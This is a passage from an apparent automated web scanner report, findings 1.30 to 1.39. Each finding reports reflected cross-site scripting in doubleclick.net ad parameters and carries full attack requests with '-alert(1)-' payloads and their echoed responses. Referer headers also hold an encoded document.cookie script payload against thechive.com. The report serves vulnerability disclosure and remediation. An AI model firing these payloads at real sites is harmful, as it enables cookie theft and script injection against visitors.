Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
v
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d99'-alert(1)-'38e55555851 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8808b'-alert(1)-'f04a9d4c145 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f01bd"-alert(1)-"fee235b1bf2 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6caa1"-alert(1)-"7a04f899c71 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:52 GMT
Expires: Mon, 07 Feb 2011 02:28:52 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71https://www.maxclarity.com/tv/?uid=BN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb0bf'-alert(1)-'66f3aad0857 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857https://www.maxclarity.com/tv/?uid=BN1_PSD1\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90fb0"-alert(1)-"59611f3a704 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc9d4'-alert(1)-'8d9112ba486 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55862'-alert(1)-'5c8556f2836 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aec3"-alert(1)-"b8c1ebf1bd1 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19f04'-alert(1)-'18424983c20 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
